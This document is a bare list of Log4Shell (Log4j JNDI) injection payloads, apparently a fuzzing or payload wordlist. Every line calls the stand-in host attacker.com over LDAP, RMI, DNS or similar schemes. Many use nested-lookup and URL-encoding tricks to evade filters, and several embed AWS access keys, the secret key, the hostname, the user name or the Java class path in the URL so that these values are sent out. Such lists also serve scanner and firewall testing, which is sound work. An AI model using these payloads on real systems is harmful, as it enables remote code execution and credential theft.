${jndi:ldap://attacker.com/a}
${jndi:rmi://attacker.com/a}
${jndi:ldaps://attacker.com/a}
${jndi:dns://attacker.com/a}
${jndi:iiop://attacker.com/a}
${jndi:corba://attacker.com/a}
${jndi:nds://attacker.com/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attacker.com/a}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attacker.com/a}
${${upper:j}ndi:${upper:l}${upper:d}a${upper:p}://attacker.com/a}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//attacker.com/a}
${j${::-n}di:ldap://attacker.com/a}
${jn${::-d}i:ldap://attacker.com/a}
${jnd${::-i}:ldap://attacker.com/a}
${${lower:jndi}:${lower:ldap}://attacker.com/a}
${${lower:${lower:jndi}}:${lower:ldap}://attacker.com/a}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://attacker.com/a}
${jndi:ldap://127.0.0.1#.attacker.com/a}
${jndi:ldap://127.0.0.1%.attacker.com/a}
${jndi:ldap://attacker.com/a?x=${hostName}}
${jndi:ldap://attacker.com/a?x=${sys:java.version}}
${jndi:ldap://attacker.com/a?x=${env:AWS_SECRET_ACCESS_KEY}}
${jndi:ldap://attacker.com/a?x=${env:PATH}}
${jndi:ldap://attacker.com/a?x=${java:os}}
${jndi:ldap://attacker.com/a?x=${java:version}}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://attacker.com/a}
${${::-$}{::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attacker.com/a}
%24%7Bjndi%3Aldap%3A%2F%2Fattacker.com%2Fa%7D
${jndi:ldap://${env:AWS_ACCESS_KEY_ID}.attacker.com/a}
${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.attacker.com/a}
${jndi:ldap://${env:HOSTNAME}.attacker.com/a}
${jndi:ldap://${sys:user.name}.attacker.com/a}
${jndi:ldap://${sys:user.dir}.attacker.com/a}
${jndi:ldap://${sys:java.class.path}.attacker.com/a}
